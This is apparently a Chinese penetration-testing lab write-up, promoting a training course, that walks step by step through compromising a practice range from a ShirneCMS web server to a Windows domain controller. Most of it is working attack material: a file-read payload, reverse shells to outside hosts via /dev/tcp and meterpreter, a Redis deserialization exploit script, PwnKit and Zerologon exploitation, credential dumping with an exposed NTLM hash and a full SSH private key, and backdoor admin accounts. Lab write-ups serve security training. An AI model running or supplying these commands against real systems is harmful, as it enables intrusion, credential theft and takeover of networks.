介绍

本次sunday靶场通关视频 已经制作成培训课程。

5.20 还有活动价

如需学习可参与 暗月的渗透测试培训 

扫一扫 添加好友咨询学习

涉及考点

这次考核的内容涉及到 php代码审计和java代码审计。

内网比较简单，只要进入域内 拿到域控问题都不大。 

找到WEB入口点 进入内网 再进行渗透就很容易获取域控的权限了。

拓扑图

考核情况

本次参与的人数共100人  成功通过的人数是6人  虽然通过率不高 但是对此还是比较满意。

以下是通过考核的同学的第二篇 都是干货。

WEB

WEB123

访问url，是shirneCMS，信息收集后，这个CMS有任意文件读取漏洞，后台地址

http://103.149.90.210/index.php/admin

对照源码读配置文件，源码：

https://gitee.com/shirnecn/ShirneCMS/tree/master/src

读取数据库配置文件

payload

http://103.149.90.210/static/ueditor/php/controller.php? action=proxy&remote=php://filter/convert.base64-encode|convert.base64-  encode|convert.base64-encode|convert.base64-encode|convert.base64- encode|convert.base64- encode/resource=../../../config/database.php&maxwidth=-1&referer=test

关键信息

return [
// 数据库类型
'type'
// 服务器地址
'hostname'
// 数据库名
'database'
// 用户名
'username'
// 密码
'password'
=> 'mysql',
=> 'localhost',

=> 'cms',

=> 'root',

=> 'vVICDU1Erw',

有用户名密码，但是不能远程连接

用yakit扫到了phpmyadmin， http://103.149.90.210:80/phpmyadmin/index.php

使用读到的数据库用户名密码登录，登录后找存网站后台管理员用户的表，是加盐的md5

下载源码，找加密方法，全局搜索$salt

跟进encode_passwd

可以看出它的加密方法就是md5（随机生成一个8位的salt+密码）写一个生成密码的代码

<?php
include ('application/common.php');
$salt=random_str(8);

// 定义待加密的密码和盐值
$password = 'xcc@123';

// 调用 encode_password () 函数进行加密
$encrypted_password = encode_password ($password, $salt);

// 输出加密后的结果
echo $encrypted_password . "n" ; echo $salt;

直接浏览器打开就可以得到password，salt

有了密码后直接去phpmyadmin创建一个管理员用户

9a776d9a18b61b59dd42844f2f39c071 BzqYHwbz

登录后台http://103.149.90.210/index.php/admin  ，后台有一个文件包含漏洞

rrr/xcc@234

分类管理-添加分类，分类别名设置为：../../../../../../tmp

在phpmyadmin写一个反弹shell的php文件到/tmp下

select '<?php system("bash -c 'bash -i >& /dev/tcp/1.1.1.1/9090 0>&1'"); ?>' into outfile '/tmp/view.tpl'

创建一个文章

在vps监听

nc -lnvp 9090

访问文章，收到了反弹的shell

msf生成一个马，msf启动监听，把马上传到网站服务上，给执行权限运行

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=11.111.111.111lport=9091 -f elf
-o xx

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp set lhost 127.0.0.1
set lport 9091 run

chmod +x xx
./xx

拿到shell后查看执行whoami查看系统和内核版本

meterpreter > sysinfo
Computer
OS
: 192.168.10.174
: Ubuntu 16.04 (Linux 4.13.0-36-generic)
Architecture : x64
BuildTuple	: x86_64-linux-musl Meterpreter : x64/linux

上传提权漏洞检测脚本 linux-exploit-suggester.sh使用cve-20210-4034提权

https://github.com/berdav/CVE-2021-4034

meterpreter > upload /home/kali/桌面/cve-2021-4034.sh meterpreter > shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@web123:~/html/public/xxx$ chmod 777 cve-2021-4034.sh 
www-data@web123:~/html/public/xxx$ ./cve-2021-4034.sh

提权之后用root权限运行cs的马

到root目录下找flag

把root权限的shell给msf也来一个，直接运行之前传的msf马就行

内网

WEB

上传fscan扫描192.168.10.135，有redis

[+] Redis:192.168.10.175:6379 abc123 file:/var/lib/redis/dump.rdb 
[+] Redis:192.168.10.175:6379 like can write /var/spool/cron/

msf运行代理

使用代理连接redis，查看信息,是Linux proxychains4 redis-cli -h 192.168.10.175 -p 6379

192.168.10.175:6379> info
# Server redis_version:5.0.7 redis_git_sha1:00000000 redis_git_dirty:0
redis_build_id:66bd629f924ac924 redis_mode:standalone
os:Linux 5.4.0-148-generic x86_64 arch_bits:64 multiplexing_api:epoll atomicvar_api:atomic-builtin gcc_version:9.3.0
process_id:912 run_id:904aee777d5087ca561c0934c5dd14e5229a0893 tcp_port:6379

利用脚本反序列化反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC85MDkwIDA+JjE=}|{base64,- d}|{bash,-i}

import pyyso import socket
s=socket.socket() s.connect(("192.168.10.175",6379))
redis_password = "abc123"
s.send (b"*2rn$4rnAUTHrn$" + str (len (redis_password)).encode () + b"rn" + redis_password.encode () + b"rn")
whatever=b"yuy" key=b"shiro:session:"+whatever value=pyyso.cb1v192("bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC85MDkwIDA+JjE=}|{base64,-d}|
{bash,-i}") s.send(b"x2ax33x0dx0ax24x33x0dx0aSETrnx24"+str(len(key)).encode()+b"rn"+k  ey+b"rnx24"+str(len(value)).encode()+b"rn"+value+b"rn")
if b"+OK" in s.recv(3): print("success")

远程下载msf马，反弹shell到msf信息收集

meterpreter > sysinfo
Computer
OS
: 192.168.10.175
: Ubuntu 20.04 (Linux 5.4.0-148-generic)
Architecture : x64
BuildTuple	: x86_64-linux-musl Meterpreter : x64/linux

上传漏洞检测脚本进行检测提权漏洞

Available information:
Kernel version: 5.4.0 Architecture: x86_64 Distribution: ubuntu Distribution version: 20.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits Possible Exploits:
cat: write error: Broken pipe cat: write error: Broken pipe
[+] [CVE-2022-2586] nft_object UAF

Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21
],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based- overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based- overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main


[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

Details: https://google.github.io/security-research/pocs/linux/cve-2021- 22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security- research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021- 22555/exploit.c
Comments: ip_tables kernel module must be loaded [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a- limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/  Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250- exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit- db.com/exploits/41154

msf搜索提权漏洞

run post/multi/recon/local_exploit_suggester
[*] 127.0.0.1 - Collecting local exploits for x64/linux... [*] 127.0.0.1 - 176 exploit checks are being tried...
[+] 127.0.0.1 - exploit/linux/local/cve_2021_3493_overlayfs: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/linux/local/su_login: The target appears to be vulnerable. [*] Running check method for exploit 57 / 57
[*] 127.0.0.1 - Valid modules for session 45:
=============================
#	Name	Potentially
Vulnerable? Check Result
-
1 exploit/linux/local/cve_2021_3493_overlayfs
The target appears to be vulnerable.
Yes
2 exploit/linux/local/cve_2022_0995_watch_queue
The target appears to be vulnerable.
Yes
3 exploit/linux/local/su_login
The target appears to be vulnerable.
Yes

cve、计划任务、suid都试了，无法提权

峰回路转在webshell上翻目录翻到了ssh的私钥

-----BEGIN OPENSSH PRIVATE KEY-----
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 hR565R8BAlukacJQAAAAhyb290QHBjMQE=
-----END OPENSSH PRIVATE KEY-----

是在home/web找到的，所以尝试ssh链接web，但是不行，然后之前扫描192.168.10.172只开了22，所以直接连接172的root，连接成功了

PC1

ssh -T -i id_rsa [email protected] /bin/bash

AD2012

上传fscan扫描两台10段主机

有邮件服务器和域控,知道了域的FQDN

NetBios: 10.10.10.137	exchange.sunday.club [*]10.10.10.133
[->]ad2012
[->]10.10.10.133

使用cve-2020-1472的poc测试是否存在漏洞

python3 zerologon_tester.py ad2012 10.10.10.133

返回存在

Success! DC can be fully compromised by a Zerologon attack.

置空域控密码

proxychains4 python3 cve-2020-1472-exploit.py ad2012 10.10.10.133

导出hash

proxychains4 python3 secretsdump.py sunday.club/[email protected] -no-pass sunday.clubAdministrator:500:aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e773461  3258caffe

使用hash登录域控

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e7734613258caffe sunday.club/[email protected]

开启3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 netstat -an|find "3389"

允许防火墙通过

netsh firewall add portopening protocol = TCP port = 3389 name = rdp

创建管理员用户

net user cc aaa@123 /add
net localgroup administrators cc /add

使用frp进行内网穿透，把10段网络代理出来

192.168.10.175运行frpc和frps frpc配置

[common]
server_addr = 1.1.1.1
server_port = 7000

[socks] type = tcp
remote_port = 9098 
plugin = socks5

frps配置

[common] 
bind_port = 7000

192.168.10.172运行frpc

[common]
server_addr = 192.168.10.175
server_port = 7000

[socks] type = tcp
remote_port = 9099 
plugin = socks5

远程桌面连接域控

EXchange

使用CVE-2021-26855+CVE-2021-27065实现RCE

.ProxyLogon.py --host=10.10.10.137 [email protected] https://10.10.10.137/aspnet_client/WXcOasRuSA.aspx?command=Response.Write(new  ActivexObject("wscript.shell").exec("whoami").Stdout.ReadAll());
exec里替换命令即可但是没有成功

换个思路就是既然有域控hash，直接横移也可以用msf的psexec

#域控

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp set lport 9092
set rhost 10.10.10.133 set smbuser
set smbuser aministrator set smbuser administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e7734613258caffe set smbdomain sunday.club
run

#邮件服务器，修改下IP就行 set rhost 10.10.10.137 run

完结撒花

Flag

moonsec_flag{bbb0ae8a2c7d0ecc589621699f28afde} moonsec_flag{17d03da6474ce8beb13b01e79f789e63}moonsec_flag{26d300091986f45ca21d1cd6b7b79832}moonsec_flag{6d4db5ff0c117864a02827bad3c361b9} moonsec_flag{a81c3d94aa192d3f87ed9f2fffec04fc}

原文始发于微信公众号（moonsec）：暗月渗透测试五月考核文章第二篇